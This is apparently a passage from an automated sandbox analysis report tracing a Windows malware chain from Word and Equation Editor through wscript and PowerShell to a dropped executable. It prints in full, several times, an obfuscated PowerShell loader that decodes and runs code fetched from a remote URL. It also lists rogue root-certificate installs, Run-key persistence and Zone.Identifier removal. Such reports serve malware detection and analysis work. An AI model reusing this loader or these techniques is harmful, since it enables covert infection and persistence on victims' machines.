');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00618F56 push eax; retf	2_2_00618F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060F805 pushad ; ret	2_2_0060F80A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006101F4 push eax; retf	2_2_006101F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00880D62 push eax; mov dword ptr [esp], ecx	7_2_00880F64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00880F4C push eax; mov dword ptr [esp], ecx	7_2_00880F64
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_20215BC0 pushfd ; ret	15_2_20215BF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 15_2_2035C011 push 0C203468h; ret	15_2_2035C01D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DDF35A push esi; retf	22_2_07DDF35C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DDFA8C push eax; iretd	22_2_07DDFA8D
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 24_2_005A13F4 pushfd ; retf	24_2_005A13F5
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 24_2_005A2C99 push ecx; ret	24_2_005A2CAC
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 31_2_005B13F4 pushfd ; retf	31_2_005B13F5
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 31_2_005B2C99 push ecx; ret	31_2_005B2CAC

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0062B84C

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup key
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FTSKIaM			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup key
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Startup key

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes \| delete
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes \| delete

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
